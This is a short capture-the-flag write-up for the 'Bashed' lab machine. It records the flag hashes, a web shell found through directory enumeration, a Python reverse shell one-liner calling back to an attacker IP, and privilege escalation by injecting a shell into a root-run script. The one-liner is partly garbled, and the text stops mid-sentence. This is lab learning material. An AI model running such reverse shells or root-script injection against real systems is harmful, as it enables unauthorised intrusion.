Bashed – 10.10.10.68

Target Enumeration:

OS: Linux

IP: 10.10.10.68

User: 2c281f318555dbc1b856957c7147bfc1

Root: cc4f0afe3a1026d402ba10329674a8e2

Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Vulnerability Exploited:

Externally accessible php script which allows remote code execution.

Privilege Escalation.

Writable python file running as root.

Exploiting the host:

Nmap

Dirb found /dev/ which was hosting a phpbash.php script which allowed remote code execution.

The following shell worked:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.11”,2492));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(![image]);’

This user was restricted so looking at the /etc/passwd file we found a user

We executed the same reverse shell on port 443 as the user scriptmanager

So now we have a low privileged user as scriptmanager

We found a scripts folder in the root dir

We could see it was running the test.py file as root so we could inject a shell into the test.py file to see if that would give us a reverse root shell on port 444.

Checking the contents of test.py.

After a breif period we found we had a root shell,